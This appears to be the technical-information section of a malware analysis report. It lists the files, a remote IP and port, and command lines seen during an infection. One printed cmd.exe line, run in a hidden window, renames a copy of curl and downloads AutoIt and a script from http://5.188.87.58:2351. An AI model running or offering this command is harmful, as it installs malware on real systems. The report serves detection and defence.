Technical Information
- '<SYSTEM32>\wscript.exe' "C:\wuoq\ehqgzk.vbs"
- C:\wuoq\ehqgzk.vbs
- '5.##8.87.58':2351
- http://5.###.87.58:2351/pecnejml via 5.##8.87.58
- '<SYSTEM32>\cmd.exe' /c mkdir c:\pecn & cd /d c:\pecn & copy <SYSTEM32>\curl.exe pecn.exe & pecn -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & pecn -o kmrbdo.au3 http://5.188.87.58:2351/msipecnejml...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c mkdir c:\pecn & cd /d c:\pecn & copy <SYSTEM32>\curl.exe pecn.exe & pecn -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & pecn -o kmrbdo.au3 http://5.188.87.58:2351/msipecnejml...